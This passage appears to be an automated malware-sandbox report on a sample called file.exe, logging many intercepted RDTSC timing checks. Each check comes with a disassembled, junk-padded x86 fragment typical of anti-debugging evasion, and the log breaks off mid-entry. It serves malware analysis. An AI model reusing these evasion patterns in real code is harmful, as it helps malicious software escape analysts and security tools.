Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0156 second address: 16149B3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8078BD3386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D33E4h], ebx 0x00000015 push dword ptr [ebp+122D0711h] 0x0000001b xor dword ptr [ebp+122D1D68h], edx 0x00000021 call dword ptr [ebp+122D17ABh] 0x00000027 pushad 0x00000028 stc 0x00000029 xor eax, eax 0x0000002b stc 0x0000002c sub dword ptr [ebp+122D3322h], eax 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 pushad 0x00000037 and dx, 0C40h 0x0000003c mov edi, dword ptr [ebp+122D296Ch] 0x00000042 popad 0x00000043 mov dword ptr [ebp+122D2BE4h], eax 0x00000049 jng 00007F8078BD3393h 0x0000004f pushad 0x00000050 mov eax, dword ptr [ebp+122D2918h] 0x00000056 mov ecx, 5962A91Eh 0x0000005b popad 0x0000005c mov esi, 0000003Ch 0x00000061 mov dword ptr [ebp+122D36DDh], eax 0x00000067 jmp 00007F8078BD338Ah 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 jmp 00007F8078BD338Eh 0x00000075 lodsw 0x00000077 or dword ptr [ebp+122D189Bh], edi 0x0000007d mov dword ptr [ebp+122D19C6h], edx 0x00000083 add eax, dword ptr [esp+24h] 0x00000087 stc 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c jns 00007F8078BD3393h 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jmp 00007F8078BD3390h 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D01F9 second address: 17D01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D01FD second address: 17D020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8078BD338Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D02FC second address: 17D0340 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F80798BCE5Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F80798BCE58h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sbb ch, FFFFFFCCh 0x0000002b nop 0x0000002c push ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F80798BCE5Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0340 second address: 17D036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8078BD3397h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D051C second address: 17D0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D062E second address: 17D0638 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8078BD3386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D09CC second address: 17D09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0ADB second address: 17D0AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0D14 second address: 17D0D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F80798BCE58h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0D29 second address: 17D0D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0D2D second address: 17D0D64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F80798BCE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F80798BCE56h 0x00000011 jmp 00007F80798BCE62h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007F80798BCE5Ch 0x00000024 jp 00007F80798BCE56h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0E9C second address: 17D0F0D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8078BD339Ah 0x00000008 jmp 00007F8078BD3394h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F8078BD3388h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov di, AA51h 0x00000030 lea eax, dword ptr [ebp+1248E842h] 0x00000036 pushad 0x00000037 call 00007F8078BD3396h 0x0000003c movsx edx, si 0x0000003f pop esi 0x00000040 mov edi, esi 0x00000042 popad 0x00000043 nop 0x00000044 jng 00007F8078BD3394h 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0F0D second address: 17D0F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0F13 second address: 17D0F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0F1F second address: 17D0F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0F23 second address: 17D0F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8C29 second address: 17F8C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80798BCE69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8C46 second address: 17F8C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8C4A second address: 17F8C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F80798BCE56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8C56 second address: 17F8C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8078BD3399h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8078BD3399h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8C92 second address: 17F8CAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F80798BCE74h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F80798BCE5Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8CAE second address: 17F8CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F8CB2 second address: 17F8CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F91A7 second address: 17F91BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD338Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F91BC second address: 17F91C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F948C second address: 17F9490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17F9490 second address: 17F9498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FE1E2 second address: 17FE1E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FE1E6 second address: 17FE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FE1F2 second address: 17FE20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD3395h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FE37E second address: 17FE383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FEDFF second address: 17FEE0B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FEE0B second address: 17FEE28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FEE28 second address: 17FEE38 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8078BD3386h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FEE38 second address: 17FEE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FF0F2 second address: 17FF10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8078BD3392h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FF10D second address: 17FF135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE61h 0x00000007 jmp 00007F80798BCE63h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1800A23 second address: 1800A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177C83A second address: 177C840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177C840 second address: 177C847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18034E5 second address: 18034EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18034EC second address: 18034FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8078BD338Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18034FC second address: 180350D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F80798BCE56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180350D second address: 1803538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Dh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8078BD3395h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177FF1B second address: 177FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 177FF20 second address: 177FF28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808033 second address: 180803D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F80798BCE5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808185 second address: 1808192 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F8078BD3386h 0x00000009 pop edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808192 second address: 1808198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808198 second address: 18081B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8078BD3392h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18081B5 second address: 18081C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F80798BCE56h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180831E second address: 1808353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Bh 0x00000007 jmp 00007F8078BD3398h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8078BD338Ah 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808353 second address: 1808357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808357 second address: 1808369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jno 00007F8078BD3386h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808369 second address: 1808386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F80798BCE68h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180868D second address: 18086A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8078BD3390h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18086A4 second address: 18086A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808822 second address: 1808843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8078BD3386h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jnl 00007F8078BD338Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F8078BD3386h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1808843 second address: 180884E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C7B0 second address: 180C7B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C7B8 second address: 180C7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C7BC second address: 180C7D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F8078BD338Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C7D4 second address: 180C7F4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F80798BCE5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F80798BCE56h 0x00000014 jmp 00007F80798BCE5Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17833F6 second address: 1783413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jg 00007F8078BD3386h 0x0000000b jno 00007F8078BD3386h 0x00000011 pop edi 0x00000012 pushad 0x00000013 jg 00007F8078BD3386h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1783413 second address: 1783419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180FB96 second address: 180FBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD338Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180FBA9 second address: 180FBAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180FBAD second address: 180FBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3390h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F8078BD338Ch 0x00000011 jo 00007F8078BD3386h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180F793 second address: 180F79D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180F79D second address: 180F7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3398h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1812798 second address: 18127A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18127A1 second address: 18127A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18127A9 second address: 18127BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F80798BCE56h 0x0000000d jno 00007F80798BCE56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18168BB second address: 18168C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18161B7 second address: 18161BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18161BE second address: 18161C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1816322 second address: 1816337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F80798BCE5Dh 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A7A1 second address: 181A7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8078BD3386h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1819F2A second address: 1819F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A096 second address: 181A09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A235 second address: 181A23B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181A370 second address: 181A38A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3394h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181FF91 second address: 181FF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181EB55 second address: 181EB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181EB5F second address: 181EB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181EB65 second address: 181EB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181ECB6 second address: 181ECBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D083C second address: 17D0842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0842 second address: 17D0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17D0846 second address: 17D08E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F8078BD3388h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+1248E881h] 0x00000029 mov cl, EFh 0x0000002b add eax, ebx 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F8078BD3388h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D200Dh], edi 0x0000004d push eax 0x0000004e jmp 00007F8078BD3398h 0x00000053 mov dword ptr [esp], eax 0x00000056 xor dx, 0AFBh 0x0000005b push 00000004h 0x0000005d mov edx, 57613601h 0x00000062 nop 